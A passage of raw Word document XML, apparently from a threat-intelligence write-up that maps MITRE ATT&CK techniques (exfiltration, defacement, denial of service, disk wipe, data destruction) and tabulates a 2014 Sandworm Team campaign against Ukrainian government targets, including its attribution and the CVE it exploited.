      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:r w:rsidRPr="00736B2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00736B2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1041 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00736B2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exfiltration Over C2 Channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AE2078" w14:textId="77777777" w:rsidR="00B76AEB" w:rsidRPr="00B76AEB" w:rsidRDefault="00B76AEB" w:rsidP="00B76AEB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next tactic is TA</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0040 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Impact ['T1491.002', 'T1499', 'T1561.002', 'T1485']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1020481B"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T1491.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Defacement&gt;:External Defacement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417AE33E"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Next Technique is T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1499 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Endpoint Denial of Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226C8B2E" w14:textId="77777777" w:rsidR="00B76AEB" w:rsidRPr="00B76AEB"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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1561.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Disk Wipe&gt;:Disk Structure Wipe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05598BBF" w14:textId="39242C64" w:rsidR="00B76AEB" w:rsidRPr="005935F8" w:rsidRDefault="00B76AEB" w:rsidP="00B76AEB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:r w:rsidRPr="00736B2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00736B2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1485 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00736B2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Data Destruction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64565BAA" w14:textId="175CA0FB" w:rsidR="00706361" w:rsidRDefault="00706361" w:rsidP="00706361">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="130" w:name="_Toc153480901"/>
      <w:r>
        <w:t xml:space="preserve">T1566.001 </w:t>
      </w:r>
      <w:r w:rsidR="0073205A">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0073205A">
        <w:t>Six Russian GRU Officers Charged in Connection with Worldwide Deployment of Destructive Malware</w:t>
      </w:r>
      <w:bookmarkEnd w:id="130"/>
    </w:p>
    <w:p w14:paraId="600766F1" w14:textId="77777777" w:rsidR="00706361" w:rsidRDefault="00706361" w:rsidP="00706361">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706361" w:rsidRPr="002D1D50" w14:paraId="77182802" w14:textId="77777777" w:rsidTr="00740ADA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="170511C1" w14:textId="77777777" w:rsidR="00706361" w:rsidRPr="002D1D50" w:rsidRDefault="00706361" w:rsidP="00CB5B96">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3886E9A9" w14:textId="1B85C888" w:rsidR="00706361" w:rsidRPr="002D1D50" w:rsidRDefault="004430D6" w:rsidP="00CB5B96">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2ABEDC5A" w14:textId="77777777" w:rsidR="00706361" w:rsidRPr="00387DCC" w:rsidRDefault="00706361" w:rsidP="00CB5B96">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00387DCC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004430D6" w:rsidRPr="00B857D7" w14:paraId="38E94331" w14:textId="77777777" w:rsidTr="00740ADA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E4DE11F" w14:textId="77777777" w:rsidR="004430D6" w:rsidRDefault="004430D6" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CC2447E" w14:textId="7479E566" w:rsidR="004430D6" w:rsidRDefault="004430D6" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Sandworm Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73CA74A1" w14:textId="77777777" w:rsidR="004430D6" w:rsidRPr="00387DCC" w:rsidRDefault="004430D6" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00706361" w:rsidRPr="00B857D7" w14:paraId="6120CECA" w14:textId="77777777" w:rsidTr="00740ADA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74C3C138" w14:textId="77777777" w:rsidR="00706361" w:rsidRPr="007328DE" w:rsidRDefault="00706361" w:rsidP="00CB5B96">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14D88226" w14:textId="77777777" w:rsidR="00706361" w:rsidRPr="007328DE" w:rsidRDefault="00706361" w:rsidP="00CB5B96">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5105A892" w14:textId="01D35F3C" w:rsidR="00706361" w:rsidRPr="00387DCC" w:rsidRDefault="00D147C1" w:rsidP="00CB5B96">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[2]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00706361" w:rsidRPr="00B857D7" w14:paraId="1D01B310" w14:textId="77777777" w:rsidTr="00740ADA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42AA0ED9" w14:textId="77777777" w:rsidR="00706361" w:rsidRDefault="00706361" w:rsidP="00CB5B96">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Attack Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11087127" w14:textId="74BC492B" w:rsidR="00706361" w:rsidRPr="007328DE" w:rsidRDefault="00833514" w:rsidP="00CB5B96">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Russia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BE9A23D" w14:textId="77777777" w:rsidR="00706361" w:rsidRPr="00387DCC" w:rsidRDefault="00706361" w:rsidP="00CB5B96">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00706361" w:rsidRPr="00B857D7" w14:paraId="48FEE5C8" w14:textId="77777777" w:rsidTr="00740ADA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="653F296D" w14:textId="77777777" w:rsidR="00706361" w:rsidRDefault="00706361" w:rsidP="00CB5B96">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="432538C7" w14:textId="37A6630E" w:rsidR="00706361" w:rsidRDefault="00E01554" w:rsidP="00CB5B96">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E01554">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Ukrain</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05FFFFA4" w14:textId="4E1EA377" w:rsidR="00706361" w:rsidRPr="00387DCC" w:rsidRDefault="00D147C1" w:rsidP="00CB5B96">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[2]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00706361" w:rsidRPr="00B857D7" w14:paraId="678D1218" w14:textId="77777777" w:rsidTr="00740ADA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75C21420" w14:textId="77777777" w:rsidR="00706361" w:rsidRDefault="00706361" w:rsidP="00CB5B96">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="318B1419" w14:textId="6B9934DD" w:rsidR="00706361" w:rsidRDefault="00E01554" w:rsidP="00CB5B96">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E01554">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Ukrainian government organization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F8EE251" w14:textId="647D38F0" w:rsidR="00706361" w:rsidRPr="00387DCC" w:rsidRDefault="00D147C1" w:rsidP="00CB5B96">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[2]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006469E0" w:rsidRPr="00B857D7" w14:paraId="10069CC2" w14:textId="77777777" w:rsidTr="00740ADA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29FC064D" w14:textId="77777777" w:rsidR="006469E0" w:rsidRDefault="006469E0" w:rsidP="006469E0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="448A7ACF" w14:textId="77A4ED76" w:rsidR="006469E0" w:rsidRDefault="006469E0" w:rsidP="006469E0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Exfiltration (confidentiality), Damage </w:t>
            </w:r>
            <w:r>
              <w:t>(integrity and availability)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F9631F1" w14:textId="0730A889" w:rsidR="006469E0" w:rsidRDefault="006469E0" w:rsidP="006469E0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] Damage [2] </w:t>
            </w:r>
            <w:r w:rsidRPr="00D147C1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>cyber-espionage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00706361" w:rsidRPr="00B857D7" w14:paraId="5B01D623" w14:textId="77777777" w:rsidTr="00740ADA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68B86669" w14:textId="77777777" w:rsidR="00706361" w:rsidRDefault="00706361" w:rsidP="00CB5B96">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="053DC33C" w14:textId="092C4015" w:rsidR="00706361" w:rsidRDefault="009D356E" w:rsidP="00CB5B96">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009D356E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>CVE-2014-4114</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D77764B" w14:textId="77777777" w:rsidR="00706361" w:rsidRDefault="00706361" w:rsidP="00CB5B96">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00706361" w:rsidRPr="00B857D7" w14:paraId="42CDCC44" w14:textId="77777777" w:rsidTr="00740ADA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7080F413" w14:textId="77777777" w:rsidR="00706361" w:rsidRDefault="00706361" w:rsidP="00CB5B96">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Related Attack Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E20644E" w14:textId="77777777" w:rsidR="00706361" w:rsidRDefault="00706361" w:rsidP="00CB5B96">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BB4D149" w14:textId="77777777" w:rsidR="00706361" w:rsidRDefault="00706361" w:rsidP="00CB5B96">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00740ADA" w:rsidRPr="00B857D7" w14:paraId="4E80D429" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="378582A2" w14:textId="77777777" w:rsidR="00740ADA" w:rsidRDefault="00740ADA" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Preceded By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17F1427E" w14:textId="77777777" w:rsidR="00740ADA" w:rsidRDefault="00740ADA" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D9093BF" w14:textId="77777777" w:rsidR="00740ADA" w:rsidRDefault="00740ADA" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Reference </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00740ADA" w:rsidRPr="00B857D7" w14:paraId="7ADB41A3" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F581790" w14:textId="77777777" w:rsidR="00740ADA" w:rsidRDefault="00740ADA" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Schema Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="318CD404" w14:textId="77777777" w:rsidR="00740ADA" w:rsidRDefault="00740ADA" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02AE7C17" w14:textId="77777777" w:rsidR="00740ADA" w:rsidRDefault="00740ADA" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To allow for future new chain models</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00706361" w:rsidRPr="00B857D7" w14:paraId="61D7BCD5" w14:textId="77777777" w:rsidTr="00740ADA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C221202" w14:textId="593DEBE4" w:rsidR="00706361" w:rsidRDefault="006C558F" w:rsidP="00CB5B96">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7219D79A" w14:textId="626EB7E2" w:rsidR="00706361" w:rsidRDefault="00E0220D" w:rsidP="00CB5B96">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2014</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="647118F8" w14:textId="77777777" w:rsidR="00706361" w:rsidRDefault="00706361" w:rsidP="00CB5B96">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C558F" w:rsidRPr="00B857D7" w14:paraId="7345DF5E" w14:textId="77777777" w:rsidTr="00740ADA">
        <w:tc>
